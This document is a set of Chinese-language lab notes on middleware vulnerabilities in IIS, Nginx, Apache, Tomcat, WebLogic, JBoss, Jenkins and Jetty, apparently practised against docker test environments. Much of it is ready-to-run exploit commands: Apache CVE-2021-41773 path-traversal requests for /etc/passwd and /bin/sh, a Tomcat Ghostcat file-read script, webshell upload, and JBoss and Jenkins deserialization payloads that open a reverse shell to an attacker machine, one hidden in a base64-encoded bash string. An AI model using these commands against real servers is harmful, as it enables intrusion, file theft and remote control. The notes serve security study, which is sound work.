一.中間件-IIS-短文件&解析&藍(lán)屏

IIS現(xiàn)在用的也少了，漏洞也基本沒啥用

1、短文件：信息收集

2、文件解析：還有點(diǎn)用

3、HTTP.SYS：藍(lán)屏崩潰?

?沒有和權(quán)限掛鉤

4、CVE-2017-7269 條件過老

windows 2003上面的漏洞

二.中間件-Nginx-文件解析&命令執(zhí)行等

后綴解析 文件名解析

運(yùn)行此靶場

sudo docker-compose up -d

查看啟動環(huán)境

sudo docker?ps

Bp抓包修改文件信息，添加/.php解析php代碼

CVE-2013-4547（文件名邏輯漏洞）

CVE-2013-4547漏洞是由于非法字符空格和截止符導(dǎo)致Nginx在解析URL時的有限狀態(tài)機(jī)混亂，導(dǎo)致攻擊者可以通過一個非編碼空格繞過后綴名限制。假設(shè)服務(wù)器中存在文件123.?jpg，則可以通過改包訪問讓服務(wù)器認(rèn)為訪問的為PHP文件

兩處將aa 61 61改為20 00

成功解析php文件

cve_2017_7529 敏感信息泄露

意義不大

CVE-2021-41773(42013) Apache HTTP Server路徑穿越漏洞復(fù)現(xiàn)

Apache 披露了一個在 Apache HTTP Server 2.4.49 上引入的漏洞，稱為 CVE-2021-41773。同時發(fā)布了2.4.50更新，修復(fù)了這個漏洞。該漏洞允許攻擊者繞過路徑遍歷保護(hù)，使用編碼并讀取網(wǎng)絡(luò)服務(wù)器文件系統(tǒng)上的任意文件。運(yùn)行此版本 Apache 的 Linux 和 Windows 服務(wù)器都受到影響。此漏洞是在 2.4.49 中引入的，該補(bǔ)丁旨在提高 URL 驗(yàn)證的性能?？梢酝ㄟ^對“.”進(jìn)行編碼來繞過新的驗(yàn)證方法。如果 Apache 網(wǎng)絡(luò)服務(wù)器配置未設(shè)置為“要求全部拒絕”，則漏洞利用相對簡單。通過對這些字符進(jìn)行編碼并使用有效負(fù)載修改 URL，可以實(shí)現(xiàn)經(jīng)典的路徑遍歷。

二、影響版本

• 41773——版本等于2.4.49
• 42013——版本等于2.4.49/50

curl -v --path-as-is http://123.58.224.8:8005/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

curl -v --path-as-is http://123.58.224.8:8005/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

cve-2017-9798

? ? ? ? 信息泄露? 價值不高。

cve-2018-11759

????????價值不高。

cve-2021-37580

? ? ? ? shenyu 插件問題。

Tomcat

1.弱口令

進(jìn)入頁面，點(diǎn)擊manager或直接url輸入進(jìn)去登錄頁面

哥斯拉生成jsp文件

上傳木馬拿到webshell

2.cve-2017-12615

Poc直接梭哈

腳本上傳jsp實(shí)現(xiàn)cve

3.cve-2020-1938

python2 CVE-2020-1938.py 123.58.224.8?-p 57312?-f /WEB-INF/web.xml

poc直接梭哈查看web-inf/目錄下的文件

python CVE-2020-1938.py 123.58.224.8 -p 57312 -f /WEB-INF/web.xml

123.58.224.8:57312

CVE-2020-11996 拒絕服務(wù)漏洞 （意義不大）

????????簡介：Tomcat http/2 拒絕服務(wù)攻擊，通過惡意構(gòu)造HTTP/2請求序列會在幾秒鐘內(nèi)大量占用CPU使用率，如果在并發(fā)HTTP/2連接上發(fā)出足夠數(shù)量的此類請求，服務(wù)器可能會變得無響應(yīng)。

????????影響版本：

????????Apache Tomcat 10.0.0-M1~10.0.0-M5 / 9.0.0.M1~9.0.35 / 8.5.0~8.5.55

該漏洞與獲取權(quán)限無關(guān)，單純?yōu)槠茐男月┒?#xff0c;畢竟學(xué)習(xí)漏洞不是為了搞破壞，研究意義不大。

CVE-2020-9484 反序列化漏洞 （條件苛刻）

簡介：Apache Tomcat 是一個開放源代碼、運(yùn)行servlet和JSP Web應(yīng)用軟件的基于Java的Web應(yīng)用軟件容器。當(dāng)Tomcat使用自帶session同步功能時，使用不安全的配置（沒有使用EncryptInterceptor）會存在反序列化漏洞，攻擊者通過精心構(gòu)造的數(shù)據(jù)包， 可以對使用了自帶session同步功能的Tomcat服務(wù)器進(jìn)行攻擊。

影響版本：

Apache Tomcat 10.x < 10.0.0-M5 / 9.x < 9.0.35 / 8.x < 8.5.55 / 7.x < 7.0.104

此漏洞利用條件非?？量?#xff0c;研究意義不大，成功利用此漏洞需同時滿足以下4個條件:

????1.攻擊者能夠控制服務(wù)器上文件的內(nèi)容和文件名稱

????2.服務(wù)器PersistenceManager配置中使用了FileStore

????3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置為“null”，或者過濾器不夠嚴(yán)格，導(dǎo)致允許攻擊者提供反序列化數(shù)據(jù)的對象

? ? 4.攻擊者知道使用的FileStore存儲位置到攻擊者可控文件的相對路徑

http://192.168.83.136:8080/invoker/readonly

查看返回狀態(tài)碼500存在漏洞

Weblogic

Cve-2018

一、漏洞簡介

weblogic的WLS Security組件對外提供webservice服務(wù)，其中使用了XMLDecoder來解析用戶傳入的XML數(shù)據(jù)，在解析的過程中出現(xiàn)反序列化漏洞，導(dǎo)致可執(zhí)行任意命令。

二、漏洞影響

影響版本

10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0

CVE-2018-2894

CVE-2020-14882

0x01 漏洞描述

近日，Oracle WebLogic Server 遠(yuǎn)程代碼執(zhí)行漏洞 （CVE-2020-14882）POC 被公開,未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者可能通過構(gòu)造特殊的 HTTP GET請求，利用該漏洞在受影響的 WebLogic Server 上執(zhí)行任意代碼。它們均存在于WebLogic的Console控制臺組件中。此組件為WebLogic全版本默認(rèn)自帶組件，且該漏洞通過HTTP協(xié)議進(jìn)行利用。將CVE-2020-14882和CVE-2020-14883進(jìn)行組合利用后，遠(yuǎn)程且未經(jīng)授權(quán)的攻擊者可以直接在服務(wù)端執(zhí)行任意代碼，獲取系統(tǒng)權(quán)限

0x02? 漏洞影響

Oracle WebLogic Server，版本10.3.6.0，12.1.3.0，12.2.1.3，12.2.1.4，14.1.1.0

CVE-2018-2628

掃到了cve-2016-3510什么鬼

Jboss

CVE-2017-7504

1.javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2.java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.83.159:2222
（IP是攻擊機(jī)ip,port是要監(jiān)聽的端口)

curl http://192.168.83.136:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

CVE-2017-12149

http://192.168.83.136:8080/invoker/readonly

返回500

中間件-Jenkins-CVE

CVE-2017-1000353? 遠(yuǎn)程代碼執(zhí)行漏洞

192.168.83.159:2222

//生成序列化字符串poc.ser,這里反彈shell命令需要用base編碼

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgzLjE1OS8yMjIyIDA+JjE=}|{base64,-d}|{bash,-i}"

//給靶機(jī)發(fā)送數(shù)據(jù)包，執(zhí)行命令

python3?exploit.py http://192.168.83.136:8080?poc.ser

CVE-2018-1000861

python2 exp.py http://192.168.83.136:8080/ 'touch /tmp/cve-2018-1000861-GitNBExp'

sudo docker exec -it d63ffa245393 ???/bin/bash

jetty

curl -v 'http://192.168.83.136:8080/%2e/WEB-INF/web.xml'

查看一些銘感信息

CVE-2021-28169

也是c查看web-inf

http://192.168.83.136:8080/static?/%2557EB-INF/web.xml

CVE-2021-34429

GET /%u002e/WEB-INF/web.xml HTTP/1.1

Host: 192.168.83.136:8080

Docker

-是否存在.dockerenv文件

ls -alh /.dockerenv

-查詢系統(tǒng)進(jìn)程的cgroup信息：

cat /proc/1/cgroup

真實(shí)機(jī)執(zhí)行命令

運(yùn)行此靶場

sudo docker-compose up -d

查看啟動環(huán)境

sudo docker?ps

關(guān)閉環(huán)境

sudo docker-compose down